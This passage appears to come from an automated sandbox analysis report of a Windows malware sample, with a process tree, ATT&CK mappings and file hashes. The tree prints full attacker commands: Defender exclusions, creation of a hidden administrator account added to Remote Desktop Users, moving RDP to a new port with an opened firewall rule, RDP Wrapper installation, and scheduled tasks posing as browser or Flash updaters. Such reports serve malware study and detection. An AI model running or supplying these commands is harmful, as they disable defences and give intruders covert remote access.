        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2616
      - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1028
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^eCkzuUqdlskzCItLydVWjmePsuOjCgqqLCjDWBmSwcPCZRUjAzbZlnrCmvwquNOWdkHqvAPEQrUQKAPAjBMpQwPjnKrAAnLgHSkOp$" Mio.xltx
      4⤵
      PID:2228
  - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
      Desideri.exe.com G
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3900
    - - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\Desideri.exe.com G
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3208
      - C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\iLsUooEhwiyqJuLIwtWlRKqYsxfqiBGzpNzjjJxhvZmpQGKwEvRmkzvbKzDNSDyAALRV\RegAsm.exe
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1780
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
        7⤵
        
        PID:448
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\1115.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\958.vbs
        7⤵
        
        PID:2080
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\1115.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\958.vbs
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2312
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\16.vbs" NpWTjsAOuM fdojlkYaMG "C:\Users\Admin\AppData\Roaming\yxJRerk\574.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\bGiAaEqQ.bat" "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll"
        7⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\16.vbs" NpWTjsAOuM fdojlkYaMG "C:\Users\Admin\AppData\Roaming\yxJRerk\574.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\bGiAaEqQ.bat" "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll" /tn "Adobe Flash Player PPAPI Notifier67"
        7⤵
        
        PID:3868
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll" /tn "Adobe Flash Player PPAPI Notifier67"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\354.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\958.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\354.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\958.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll" /tn "Обновление Браузера Яндекс15"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1796
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll" /tn "Обновление Браузера Яндекс15"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\yxJRerk\yKvIebLbtz.bat NpWTjsAOuM fdojlkYaMG"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3176
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2816
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1172
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2208
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3228
        
        C:\Windows\SysWOW64\net.exe
        
        net user NpWTjsAOuM fdojlkYaMG /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3828
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user NpWTjsAOuM fdojlkYaMG /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3652
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators NpWTjsAOuM /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2192
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators NpWTjsAOuM /add
        9⤵
        
        PID:1308
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" NpWTjsAOuM /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:4512
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" NpWTjsAOuM /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1780
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:940
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        9⤵
        
        PID:1872
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v NpWTjsAOuM /t REG_DWORD /d "00000000" /f
        8⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:1112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3636
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2700
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1124
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1828
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3252
        
        C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1384
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
        7⤵
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:3436
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:536
        
        C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1396
        
        C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4908
        
        C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3656
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Executes dropped EXE
        
        PID:2988
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:4332
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3852
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3596
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:5036
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1812
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2544
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:4500
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2732
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4704
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        9⤵
        
        PID:2208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3336
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:940
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1872
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        
        PID:1112
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        9⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:720
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4696
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:928
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3716
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1124
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1244
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\121.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\772.vbs" "WVZoa1UxQlZOWGRXTVZKeFl6QkdVR1JWTUcxU1ZtUTJWWG94YlZwSE9YRmlSM1JhV1ZVeFNFcHJVbHBVYm1SRVdqRkJPV1Y2ClZUQk9SRVY0VFd0Vk5VeFVXWHBOVkdOMENrNUVRVFZSYVRBMFRXdEpNMHhVVVhkU2FrRXdUbFZSTUZKVWF6QlJXREE5" "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3660
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\121.vbs" "C:\Users\Admin\AppData\Roaming\yxJRerk\772.vbs" "WVZoa1UxQlZOWGRXTVZKeFl6QkdVR1JWTUcxU1ZtUTJWWG94YlZwSE9YRmlSM1JhV1ZVeFNFcHJVbHBVYm1SRVdqRkJPV1Y2ClZUQk9SRVY0VFd0Vk5VeFVXWHBOVkdOMENrNUVRVFZSYVRBMFRXdEpNMHhVVVhkU2FrRXdUbFZSTUZKVWF6QlJXREE5" "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3832
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll" /tn "Adobe Flash Player PPAPI Notifier84"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4616
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\yxJRerk\VRa.dll" /tn "Adobe Flash Player PPAPI Notifier84"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3536
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3704

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\yxJRerk\574.vbs" NpWTjsAOuM fdojlkYaMG "C:\Users\Admin\AppData\Roaming\yxJRerk\bGiAaEqQ.bat"
1⤵
- Checks computer location settings
PID:640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\yxJRerk\bGiAaEqQ.bat
  2⤵
  - Drops file in System32 directory
  PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    3⤵
    PID:4248
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-544" get name /value
      4⤵
      PID:4500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    3⤵
    PID:3928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-555" get name /value
      4⤵
      PID:4988
- - C:\Windows\system32\net.exe
    net user NpWTjsAOuM fdojlkYaMG /add
    3⤵
    PID:1796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user NpWTjsAOuM fdojlkYaMG /add
      4⤵
      PID:2576
- - C:\Windows\system32\net.exe
    net localgroup Administrators NpWTjsAOuM /add
    3⤵
    PID:1704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators NpWTjsAOuM /add
      4⤵
      PID:4760
- - C:\Windows\system32\net.exe
    net localgroup Remote Desktop Users NpWTjsAOuM /add
    3⤵
    PID:1428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users NpWTjsAOuM /add
      4⤵
      PID:3640
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:1236
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:5016
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v NpWTjsAOuM /t REG_DWORD /d "00000000" /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:4632
- - C:\Windows\system32\reg.exe
    reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    3⤵
    PID:1172
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:5008
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3240
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4860
- - C:\Windows\system32\timeout.exe
    Timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:1656

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4272

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1416

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\Program Files\RDP Wrapper\rdpwrap.bat

Filesize
12KB

MD5
b365fde3be7855f4254d1e4bba45d260

SHA1
b56c6f0402b25c5d68e3a722144f5f4b5bb53d27

SHA256
2a175e17c98f9d5f436e23d1c9670f36e54cb82269bccddc87dcfbcfb04d1360

SHA512
d08e261c0f5c18041d005029cc6ed6119a8cc446607bb5f683a059d1a193d8e04d3e0b52c9f2ea871fcfa8e043c5c2886cfce5419eaf37c39003236f7a399026

Download Submit
C:\Program Files\RDP Wrapper\rdpwrap_new.ini

Filesize
181KB

MD5
12afc3fd401d3724956283c33eb796eb

SHA1
66b875153e6ee45c76ae374a95e2cec013ac94e8

